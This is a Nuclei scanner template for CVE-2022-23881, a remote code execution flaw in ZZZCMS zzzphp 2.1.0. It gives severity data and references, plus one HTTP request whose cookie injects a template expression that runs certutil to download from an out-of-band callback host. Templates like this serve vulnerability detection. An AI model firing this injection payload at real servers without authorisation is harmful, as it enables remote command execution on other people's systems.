nuclei-templates/http/cves/2022/CVE-2022-23881.yaml

47 lines
1.4 KiB
YAML

id: CVE-2022-23881
info:
name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
remediation: |
Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.
reference:
- https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md
- http://www.zzzcms.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-23881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-23881
cwe-id: CWE-77
epss-score: 0.18474
epss-percentile: 0.95696
cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zzzcms
product: zzzphp
tags: cve,cve2022,rce,zzzphp,zzzcms
http:
- raw:
- |
GET /?location=search HTTP/1.1
Host: {{Hostname}}
Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500
# digest: 4a0a00473045022100e8c00f8affdb4ec1f5dfbdec9f4bd17cd5e47b7707cbdb30a8eab20118a7e72b0220418f8f1f411b2c4e544c946416d8613870470c4c6615ebfd89659f2a32eb83f6:922c64590222798bb761d5b6d8e72950